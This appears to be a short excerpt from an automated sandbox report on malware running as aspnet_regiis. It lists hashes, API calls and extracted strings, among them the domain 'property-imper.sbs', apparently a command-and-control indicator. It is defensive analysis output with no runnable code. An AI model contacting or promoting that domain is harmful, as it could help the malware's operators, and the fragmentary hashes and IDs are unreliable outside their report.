                                                • String ID: 3$?$e
                                                • API String ID: 2832541153-3975470078
                                                • Opcode ID: 088e1c6e78a21d9a6e5ca08e70f8eba0c961a49c6f77eb8f9d9754445ec61dcc
                                                • Instruction ID: 18406e6f9ff577e3342b6cd1f13a7d53552f14b3f4d6df366e23d5a7c52a3b3b
                                                • Opcode Fuzzy Hash: 088e1c6e78a21d9a6e5ca08e70f8eba0c961a49c6f77eb8f9d9754445ec61dcc
                                                • Instruction Fuzzy Hash: 3441B07250C7818FD316AF3C948836EBFE0AF81224F484A3CE5E6962C2D6758549C7A3
                                                APIs
                                                  • Part of subcall function 027B50D0: GetSystemMetrics.USER32 ref: 027B5119
                                                  • Part of subcall function 027B50D0: GetSystemMetrics.USER32 ref: 027B5129
                                                • CoUninitialize.OLE32 ref: 0278DB1D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: MetricsSystem$Uninitialize
                                                • String ID: F$N967$property-imper.sbs$uy
                                                • API String ID: 1128523136-3187881583
                                                • Opcode ID: 87aa934849bace04d60bff2143bff94c7cf7b4d4d27097365c93cf1d7e5a91c5
                                                • Instruction ID: 1eb4d30eb4c97001d59ada18ac2dba7f596201541c251a0e4ef267df55fe6b45
                                                • Opcode Fuzzy Hash: 87aa934849bace04d60bff2143bff94c7cf7b4d4d27097365c93cf1d7e5a91c5
                                                • Instruction Fuzzy Hash: D2A1CFB014C3D18BD7369F259494BEBBFE0AB97304F1449ADD0D98B282E7784149CBA7